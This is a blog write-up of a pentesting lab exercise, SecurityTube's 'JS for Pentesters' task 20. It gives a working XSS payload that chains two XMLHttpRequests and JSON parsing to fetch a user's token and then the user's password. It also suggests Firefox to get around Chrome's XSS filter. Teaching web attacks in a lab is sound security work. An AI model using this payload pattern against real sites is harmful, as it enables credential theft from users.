XSS - Multilevel JSON Parsing: JS for Pentesters task 20 write up

Nov 3, 2014 • jsp, javascript, xss, security-tube

writeup for task-20 of the JS for pentesters series by security-tube - Multiilevel JSON parsing

Lately we saw and understood that XMLHttpRequest() is very powerful and it can not only receive strings as response but also HTML, JSON and XML too. We have seen in last challenge on how to do a Multi level HTML Parsing and now let us see how can we do a Multi level JSON parsing.

JS for Pentesters task 20

Our objective is to Find John’s Password using an XSS vulnerability on this page and Display the Password in the div with id “result”. Before continuing with this challenge, I strongly recommend you read the topic “Ajax:Parsing and reading JSON” which will cover the basics of parsing and reading JSON files with XMLHttpRequest(). I have solved this challenge in a hurry so I am not sure the following is the best solution. But I am sure payload below works ;) .

    <script>
        var request = new XMLHttpRequest();
        request.onreadystatechange = function() {
            if ((request.readyState === 4) && (request.status === 200)) {
                var items = JSON.parse(request.responseText);
                for (var keys in items) {
                    tokenid = items[keys].token;
                    break;
                }
                var req = new XMLHttpRequest();
                req.onreadystatechange = function() {
                    if ((req.readyState === 4) && (req.status === 200)) {
                        var newitems = JSON.parse(req.responseText);
                        for (var key in newitems) {
                            pass = newitems[key].password;
                            alert(pass);
                            break;
                        }
                    }
                }
                req.open('GET', '/lab/webapp/jfp/20/getpassword?token=' + tokenid);
                req.send();
            }
        }
        request.open('GET', '/lab/webapp/jfp/20/gettoken?uid=3476');
        request.send();
    </script>

So let us see what we have done here. What we basically doing here is that we need to get the token from the first request which in turn gives back a JSON file from which we need to parse and get the token and using this token we need to send a request to /lab/webapp/jfp/20/getpassword which will give us the correct password. Most of the modern browsers supports the JSON.parse function which helps us in parsing the JSON file got back by as the result.

Note:

1) While playing with XSS challenges, it is always recommended to use Mozilla Firefox because Google chrome has inbuilt XSS stopper which will stop us from executing arbitrary JavaScript code even if the page is vulnerable to XSS. So its strongly recommended to use Firefox instead of chrome.

We hope that you really liked this challenge. If there is anything you didn’t understand or wanted to get more clarity, please comment down and we are more than happy to help. Also, if you get a better way of solving the challenge, please share it with us and we are happy to learn from our readers too. Happy pentesting..

Anirudh Anand

Product Security ♥ | CTF - @teambi0s | Security Trainer - @7asecurity | certs - eWDP, OSCP, OSWE